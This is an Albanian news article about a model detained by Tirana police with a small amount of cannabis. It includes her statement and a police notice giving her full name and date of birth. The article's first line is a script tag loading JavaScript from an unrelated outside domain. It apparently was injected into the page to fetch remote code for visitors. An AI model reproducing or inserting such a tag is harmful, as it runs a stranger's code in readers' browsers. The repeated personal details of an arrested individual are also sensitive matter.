<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>
Modelja e njohur, Oriola Marashi së fundmi është ndaluar nga policia pasi në makinën ku ishte bashkë me dy miq të saj, janë gjetur dy qese farmaceutike me kanabis.
“GazetaSi” shkruan se në deklaratën e saj, Oriola ka thënë se është përdoruesve e lëndëve narkotike dhe të dyja qeset i ka për përdorim personal.
Të njëjtat burime shtojnë më tej se Oriola është shprehur se shokët e saj që ishin me të në momentin e ndalimit nuk kishin dijeni për hashashin dhe se nuk kanë lidhje me këtë çështje.
“Për herë të fundit kam pirë hashash para dy ditëve dhe shokët e mi që janë në automjet nuk dinin gjë për këtë fakt,”- mësohet të ketë thënë Marashi.
Lajmi për ndalimin e saj nga policia ka bërë bujë dhe së fundmi “BallkanWeb” ka siguruar edhe deklaratën zyrtare të policisë.
Në të thuhet se ndalimi i modeles është bërë më 8 shkurt rreth orës 19:20.
Njoftimi i plotë:
“Me dt.08.02.2020,u referuan materialet ne Prokurorine e Shk.Pare Tiranë, për shtetasen Arjola Tonin Mirashi,dtl.18.03.1995, sepse ne orën 19.20, në rrugën “Dritan Hoxha” ju gjet dhe u bllokua me cilësinë e provës materiale 1,9gr.lende narkotike e llojit Canabis Sativa. Neni 283/1”, thuhet në njoftimin e policisë.